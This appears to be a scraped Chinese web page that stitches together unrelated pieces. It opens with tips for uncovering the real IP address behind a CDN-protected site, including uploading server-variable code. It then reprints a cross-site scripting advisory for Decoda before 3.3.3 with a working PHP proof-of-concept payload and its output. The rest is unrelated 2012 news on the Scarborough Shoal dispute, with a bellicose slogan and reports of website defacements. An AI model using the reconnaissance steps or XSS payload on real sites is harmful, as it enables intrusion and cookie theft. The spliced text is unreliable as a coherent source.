现在很多网站用了cdn技术，在做一些测试的时候，想获取其服务器真实IP地址就有点困难，不知道现在还有其他什么好的方法呢，整理了下，目前知道如下两种：
 
1：拿CDN服务器 找出真实IP
cache_peer 1.1.1.1 parent 80 0 no-query originserver
cache_peer_domain 1.1.1.1  www.2cto.com

2：判断HTTP_X_FORWARDED_FOR是否为空，不为空把这个作为IP地址，否则取得REMOTE_ADDR作为IP地址。
如果服务器可以上传文件，可上传文件加如下代码：
Request.ServerVariables(“LOCAL_ADDR”)’得到服务器的IP地址
Request.ServerVariables(“REMOTE_ADDR”)’得到客户端的IP地址/这个有可能是代理
 
request.ServerVariables(“HTTP_X_FORWARDED_FOR”)’得到请求客户端真实IP地址
 
3：可以找二级域名查下
 
可以参考only_guest 的方法，找个 国外的服务器ping，一般获得都是真实IP。

Decoda 3.3.3之前版本中存在跨站脚本漏洞，该漏洞源于对用户提供的输入未经正确过滤。
 
攻击者可利用该漏洞在受影响站点上下文的不知情用户浏览器上执行任意脚本代码，盗取基于cookie的认证证书进而发起其他攻击。
 
目前厂商还没有提供此漏洞的相关补丁或者升级程序，建议使用此软件的用户随时关注厂商的主页以获取最新版本
 
可用以下的概念证明型攻击：
 
<?php
include '../decoda/Decoda.php';
$code = new Decoda();
$code->addFilter(new VideoFilter()); ?>
<?php
 
$decoda_markup = '[video="youtube" size="small"]"';
$decoda_markup .= 'onload="alert(\'RedTeam Pentesting XSS\');" id="[/video]';
 
$code->reset($decoda_markup);
echo $code->parse();
?>
 
This results in the following output (whitespace adjusted):
 
<iframe src="http:// www.2cto.com /embed/"; onload="alert('RedTeam
Pentesting XSS');" id="" width="560" height="315"
frameborder="0"></iframe>

英外交部发言人获悉此事

英国天空电视台网站在题为《英国游客中国涉嫌“性侵犯”被捕》一文中报道称，这名英国男性在视频中说过一句“没事，哥们儿！”，口音听起来像英国北部人。该报道还指出，英国外交部发言人已经表示获悉此事，并准备向这名英国人提供领事帮助。

扫平菲律宾，活捉阿基诺！！！！

中新网5月8日电 中国驻菲律宾大使馆经济商务参赞处网站今日发布《关于做好中资机构近期安全保卫工作的紧急通知》，通知要求在菲中资机构人员，尽量减少外出，外出时要结伴而行，遇游行示威，要绕道而行，不要围观。

通知全文如下：

关于做好中资机构近期安全保卫工作的紧急通知

各驻菲律宾中资机构：

据报道，近日菲律宾将举行大规模反华示威活动。为保证我在菲中资机构人员安全，现将有关注意事项通知如下，请传达至每位中方人员并认真执行：

一、提高思想认识，高度重视安全保卫工作，强化安全意识，注意人身和财产安全。

二、尽量减少外出，外出时要结伴而行，遇游行示威，要绕道而行，不要围观。

三、严格遵守当地法律法规，低调行事，避免与当地人发生争执。

四、一旦发生紧急突发事件，要及时妥善处置，并在第一时间向使馆报告。

驻菲律宾使馆经商处

二零一二年五月七日

南海示意图

菲律宾总统发言人4日宣称，菲律宾正式将黄岩岛称为“帕纳塔格礁（Panatag Shoal）”。同时，菲律宾总统阿基诺三世当天表示，菲政府已就菲中两国在黄岩岛对峙的问题征询国际法律专家的意见，准备向至少一个国际机构提出诉讼。他还鼓励菲律宾渔民前往该海域捕鱼以宣示“主权”。

关于黄岩岛的称呼，美国习惯称为“斯卡伯勒浅滩（Scarborugh Shoal）”，菲律宾习惯称为“帕纳塔格礁”。而中国人自古称之为黄岩岛，在上世纪40年代曾一度改称为“民主礁”。

据《马尼拉公报》3日报道，菲总统发言人拉谢尔在发布会上说：“帕纳塔格礁的紧张气氛已经明显得到缓和。顺便说一句，我们愿意称它为帕纳塔格礁。”当被问及这一称呼是否意味着菲律宾对该岛的主权时，拉谢尔表示是“为了简洁”。

被批不该派舰说大话

菲律宾当地报纸《每日问询者报》5月3日发表的评论性文章称，阿基诺三世一开始不应该派出战舰围堵中国渔民。评论认为，菲律宾在一开始就派出了军舰德尔·皮拉尔号，而且到目前为止，只有菲律宾派出过军舰，而中国只是派出非军方船只前往黄岩岛。之后无论事态如何发展，菲律宾都会因为首先派出军舰而理亏。此外，派出军舰显得菲律宾是好战的一方。

评论还指出，阿基诺三世不应该说大话。阿基诺三世曾对外宣称“不计一切代价”保卫国土。而在美国就南海争端问题表达中立态度后，阿基诺三世能不能坚持自己之前的言论，也成了很大的问题。

菲律宾外交部4月24日宣称确定正式邀请中国到国际海洋法法庭打官司，一周内向中国发出信息，菲律宾参议院主席称支持这一行动。

据环球时报报道，菲总统阿基诺三世当天警告东南亚邻国应该担忧北京对南中国海“日渐增长的侵略性”，他称，当前菲律宾的“武器”就是让全世界知道（别人）对我们做了什么。菲律宾共产党也发声，要求中国“紧急刹车”，从菲律宾领土上撤走船只，停止通过威胁派遣更多准军事船只到争议海域欺凌他国。

菲律宾《每日问询者报》24日报道说，菲律宾主权危如累卵，参议院正展示肌肉，启动对中国入侵“西菲律宾海”的调查。参议院对外关系委员会主席拉贾达说，“我们应该保护自己的海洋安全，这还意味着食品的持续和环境安全，我们为保护它不惜任何代价”。

4月25日，美菲“肩并肩2012”联合军演，海军陆战队近百人参加“夺岛秀”。

演习地点在菲律宾南部巴拉望省阿鲁甘湾沿岸，接近中国黄岩岛。

菲律宾卡拉扬镇镇长25日透露，将于6月在南沙群岛中的中业岛上开设小学。菲方称对中业岛已经实际控制，这将是菲律宾首次在有争议的南沙岛屿上开设学校。

中业岛是南沙群岛第二大岛，1971年，菲律宾政府占领此岛，迁入民众设立卡拉扬镇。

据菲律宾《马尼拉公报》4月27日消息，菲律宾外交部27日宣称，菲方将暂停与中国就黄岩岛问题展开新的外交对话，直到中国驻菲大使馆将双方的协议信息“真实地”传给北京。

菲外长罗萨里奥当天在一场新闻发布会上指责中国驻菲大使馆没有向中国政府传达“真实”信息。他表示，在菲律宾外交部与中国驻菲大使马可卿第三次会晤时，马可卿大使表示，中国对黄岩岛问题已经日趋“强硬”，原因是菲律宾违反了之前的一项协议。

“我说……不存在协议，这也是为什么我们还处于僵局之中的原因。”罗萨里奥称，“他们‘喋喋不休’地说我们不遵守协议。我感觉我应该向中国政府澄清一下，好像(驻菲大使的)报告并不真实。”

报道称，此前菲律宾外交部就曾指责中国驻菲使馆向中国政府传达了一项“并不存在”的协议，内容是所有船只都已经撤离对峙海域的协议。

中菲黄岩岛对峙已经超过半个月。菲律宾日前提出将把黄岩岛主权归属提交国际仲裁。中国外交部发言人刘为民27日在例行记者会上以反问形式回应说：“如果一个国家可以任意将别国领土提交国际仲裁，这个世界将会变成什么样子?”

4月22日消息：“我们来自中国。黄岩岛是我们的。”这是中国黑客攻击菲律宾最著名的大学菲律宾大学网站后，在该校主页上打出的一行文字。据菲律宾媒体报道，有黑客攻击了中国数家网站，同时打出了与中国黑客针锋相对的文字：“黄岩岛是我们的。南沙群岛是我们的。”

菲律宾“GMA News Online”网站4月21日消息称，中菲围绕黄岩岛问题产生的争议带来了另一个后果，即中国数家网站遭黑客攻击，其中包括“中国大学生自强之星”(star.chinaumu.org)、中青在线(v.cyol.com)、中青视频(ploft.cn)等7家网站。

报道称，2名黑客声称对此次攻击负责。